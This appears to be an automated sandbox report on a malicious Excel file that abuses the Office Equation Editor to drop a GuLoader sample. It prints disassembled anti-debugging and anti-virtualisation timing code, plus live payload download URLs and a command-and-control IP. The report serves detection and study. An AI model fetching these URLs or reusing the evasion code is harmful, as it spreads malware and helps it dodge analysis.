Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002773F6 second address: 00000000002774C0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov edx, 2A63ED14h 0x00000010 cmp ax, dx 0x00000013 xor edx, 8CD6B9A0h 0x00000019 xor edx, 8DA3C863h 0x0000001f cmp eax, ecx 0x00000021 sub edx, 2B169CD7h 0x00000027 test ebx, E044EBDBh 0x0000002d cmp ebx, edx 0x0000002f mov edx, dword ptr [ebp+00000238h] 0x00000035 je 00007FD67CF2C978h 0x0000003b fnop 0x0000003d mov dword ptr [ebp+00000222h], eax 0x00000043 pushad 0x00000044 mov bh, 9Ah 0x00000046 cmp bh, FFFFFF9Ah 0x00000049 jne 00007FD67CF294D2h 0x0000004f popad 0x00000050 mov eax, ebx 0x00000052 push eax 0x00000053 mov eax, dword ptr [ebp+00000222h] 0x00000059 test dl, 0000005Ah 0x0000005c cmp cx, dx 0x0000005f call 00007FD67CF2C957h 0x00000064 pushad 0x00000065 lfence 0x00000068 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002758DE second address: 000000000027593B instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 sub dword ptr [esp], F2A63F26h 0x0000000a test bx, ax 0x0000000d xor dword ptr [esp], 1168D9BEh 0x00000014 mov dword ptr [ebp+00000148h], 00000000h 0x0000001e add ebx, 04h 0x00000021 mov dword ptr [ebp+0000018Bh], esi 0x00000027 mov esi, ebx 0x00000029 push esi 0x0000002a mov esi, dword ptr [ebp+0000018Bh] 0x00000030 cmp ch, dh 0x00000032 mov dword ptr [ebp+000001E4h], ecx 0x00000038 mov ecx, 785B2C8Ch 0x0000003d test ebx, eax 0x0000003f test bx, bx 0x00000042 xor ecx, C683D913h 0x00000048 cmp dl, 00000035h 0x0000004b add ecx, 3D510807h 0x00000051 sub ecx, FC29FDA7h 0x00000057 pushad 0x00000058 mov esi, 00000084h 0x0000005d rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002792DD second address: 00000000002792DD instructions:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_00275798 rdtsc

6_2_00275798

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1984

Thread sleep time: -240000s >= -30000s

Jump to behavior

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_00275798 rdtsc

6_2_00275798

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027352B mov eax, dword ptr fs:[00000030h]		6_2_0027352B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00276E4F mov eax, dword ptr fs:[00000030h]		6_2_00276E4F

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.2355993014.0000000000890000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2355993014.0000000000890000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2355993014.0000000000890000.00000002.00000001.sdmp	Binary or memory string: !Progman

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
180.214.239.39	unknown	Viet Nam		135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://180.214.239.39/msexcel/.svchost.exe	true	Avira URL Cloud: safe	unknown
https://kinmirai.org/wp-content/bin_NIapfDNXM183.bin	true	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_NIapfDNXM183.bin"}

Multi AV Scanner detection for submitted file

Source: DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx

ReversingLabs: Detection: 30%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\bayrerss.pdb source: .svchost[1].exe.4.dr
Source:	Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\bayrerss.pdb source: .svchost[1].exe.4.dr

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 180.214.239.39:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 180.214.239.39:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 68MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://kinmirai.org/wp-content/bin_NIapfDNXM183.bin

Downloads executable code via HTTP

Source: global traffic

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 180.214.239.39 180.214.239.39

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F47FD52.emf

Jump to behavior

Source: global traffic

Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: 3F47FD52.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr	String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe

Code function: 6_2_00275798 NtAllocateVirtualMemory,

6_2_00275798

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00275798	6_2_00275798
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00274021	6_2_00274021
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00277C02	6_2_00277C02
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00277C0D	6_2_00277C0D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00272877	6_2_00272877
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00274050	6_2_00274050
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027245F	6_2_0027245F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00279058	6_2_00279058
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027489B	6_2_0027489B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00274CF4	6_2_00274CF4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002790D7	6_2_002790D7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027792B	6_2_0027792B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027352B	6_2_0027352B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00273D14	6_2_00273D14
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027796F	6_2_0027796F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027916F	6_2_0027916F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027554D	6_2_0027554D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002739D7	6_2_002739D7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00277A0B	6_2_00277A0B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00272655	6_2_00272655
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00274AAA	6_2_00274AAA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00279AB9	6_2_00279AB9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002746B8	6_2_002746B8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00274ADA	6_2_00274ADA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00277B34	6_2_00277B34
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027433C	6_2_0027433C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00278F4F	6_2_00278F4F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00278F5C	6_2_00278F5C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00273BB6	6_2_00273BB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00271BF7	6_2_00271BF7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00271BF9	6_2_00271BF9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002783CF	6_2_002783CF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002773CC	6_2_002773CC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00278FD6	6_2_00278FD6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00277BDB	6_2_00277BDB

PE file contains strange resources

Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/19@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDDD0.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx

ReversingLabs: Detection: 30%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx

Static file information: File size 1163264 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\bayrerss.pdb source: .svchost[1].exe.4.dr
Source:	Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\bayrerss.pdb source: .svchost[1].exe.4.dr

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00421041 push ss; retf	6_2_00421042
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00422433 push eax; iretd	6_2_004224A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004200E2 push eax; iretd	6_2_004200E5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004210A8 push ebx; retf	6_2_004210AE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00421D79 pushfd ; iretd	6_2_00421D97
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405D8C push eax; retf	6_2_00405DC6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004223E5 push eax; iretd	6_2_004224A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027540E pushad ; retf	6_2_00275419
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00272F61 push esi; ret	6_2_00272F63
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002783B8 push edx; ret	6_2_002783B9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00278391 push edx; ret	6_2_00278392
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00270FFD push ebx; iretd	6_2_0027100C

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00275798 NtAllocateVirtualMemory,	6_2_00275798
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00274050	6_2_00274050
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027245F	6_2_0027245F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027352B	6_2_0027352B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027433C	6_2_0027433C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00273714	6_2_00273714
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00273BB6	6_2_00273BB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002773CC	6_2_002773CC

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000276EEA second address: 00000000002773F6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add eax, FF6DF465h 0x0000000f add eax, 051D0E23h 0x00000014 cmp ch, FFFFFF9Bh 0x00000017 add eax, BB406732h 0x0000001c push ss 0x0000001d pop ss 0x0000001e jmp 00007FD67CF2C9C3h 0x00000020 cmp dword ptr [ebp+0000024Eh], eax 0x00000026 mov eax, dword ptr [ebp+0000024Eh] 0x0000002c jne 00007FD67CF2CA68h 0x00000032 pushad 0x00000033 mov bl, 77h 0x00000035 cmp bl, 00000077h 0x00000038 jne 00007FD67CF2F022h 0x0000003e popad 0x0000003f push 7DDA0CB7h 0x00000044 call 00007FD67CF2CE1Ah 0x00000049 mov eax, dword ptr fs:[00000030h] 0x0000004f mov eax, dword ptr [eax+0Ch] 0x00000052 test cx, ax 0x00000055 mov eax, dword ptr [eax+14h] 0x00000058 mov ecx, dword ptr [eax] 0x0000005a pushad 0x0000005b mov bx, 12CFh 0x0000005f cmp bx, 12CFh 0x00000064 jne 00007FD67CF25C13h 0x0000006a popad 0x0000006b mov eax, ecx 0x0000006d cmp dh, ah 0x0000006f jmp 00007FD67CF2C9C6h 0x00000071 test bh, bh 0x00000073 mov ebx, dword ptr [eax+28h] 0x00000076 test bl, dl 0x00000078 mov dword ptr [ebp+00000238h], edx 0x0000007e pushad 0x0000007f lfence 0x00000082 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002792DD second address: 00000000002792DD instructions:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000276EEA second address: 00000000002773F6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add eax, FF6DF465h 0x0000000f add eax, 051D0E23h 0x00000014 cmp ch, FFFFFF9Bh 0x00000017 add eax, BB406732h 0x0000001c push ss 0x0000001d pop ss 0x0000001e jmp 00007FD67CF2C9C3h 0x00000020 cmp dword ptr [ebp+0000024Eh], eax 0x00000026 mov eax, dword ptr [ebp+0000024Eh] 0x0000002c jne 00007FD67CF2CA68h 0x00000032 pushad 0x00000033 mov bl, 77h 0x00000035 cmp bl, 00000077h 0x00000038 jne 00007FD67CF2F022h 0x0000003e popad 0x0000003f push 7DDA0CB7h 0x00000044 call 00007FD67CF2CE1Ah 0x00000049 mov eax, dword ptr fs:[00000030h] 0x0000004f mov eax, dword ptr [eax+0Ch] 0x00000052 test cx, ax 0x00000055 mov eax, dword ptr [eax+14h] 0x00000058 mov ecx, dword ptr [eax] 0x0000005a pushad 0x0000005b mov bx, 12CFh 0x0000005f cmp bx, 12CFh 0x00000064 jne 00007FD67CF25C13h 0x0000006a popad 0x0000006b mov eax, ecx 0x0000006d cmp dh, ah 0x0000006f jmp 00007FD67CF2C9C6h 0x00000071 test bh, bh 0x00000073 mov ebx, dword ptr [eax+28h] 0x00000076 test bl, dl 0x00000078 mov dword ptr [ebp+00000238h], edx 0x0000007e pushad 0x0000007f lfence 0x00000082 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002773F6 second address: 00000000002774C0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov edx, 2A63ED14h 0x00000010 cmp ax, dx 0x00000013 xor edx, 8CD6B9A0h 0x00000019 xor edx, 8DA3C863h 0x0000001f cmp eax, ecx 0x00000021 sub edx, 2B169CD7h 0x00000027 test ebx, E044EBDBh 0x0000002d cmp ebx, edx 0x0000002f mov edx, dword ptr [ebp+00000238h] 0x00000035 je 00007FD67CF2C978h 0x0000003b fnop 0x0000003d mov dword ptr [ebp+00000222h], eax 0x00000043 pushad 0x00000044 mov bh, 9Ah 0x00000046 cmp bh, FFFFFF9Ah 0x00000049 jne 00007FD67CF294D2h 0x0000004f popad 0x00000050 mov eax, ebx 0x00000052 push eax 0x00000053 mov eax, dword ptr [ebp+00000222h] 0x00000059 test dl, 0000005Ah 0x0000005c cmp cx, dx 0x0000005f call 00007FD67CF2C957h 0x00000064 pushad 0x00000065 lfence 0x00000068 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002758DE second address: 000000000027593B instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 sub dword ptr [esp], F2A63F26h 0x0000000a test bx, ax 0x0000000d xor dword ptr [esp], 1168D9BEh 0x00000014 mov dword ptr [ebp+00000148h], 00000000h 0x0000001e add ebx, 04h 0x00000021 mov dword ptr [ebp+0000018Bh], esi 0x00000027 mov esi, ebx 0x00000029 push esi 0x0000002a mov esi, dword ptr [ebp+0000018Bh] 0x00000030 cmp ch, dh 0x00000032 mov dword ptr [ebp+000001E4h], ecx 0x00000038 mov ecx, 785B2C8Ch 0x0000003d test ebx, eax 0x0000003f test bx, bx 0x00000042 xor ecx, C683D913h 0x00000048 cmp dl, 00000035h 0x0000004b add ecx, 3D510807h 0x00000051 sub ecx, FC29FDA7h 0x00000057 pushad 0x00000058 mov esi, 00000084h 0x0000005d rdtsc
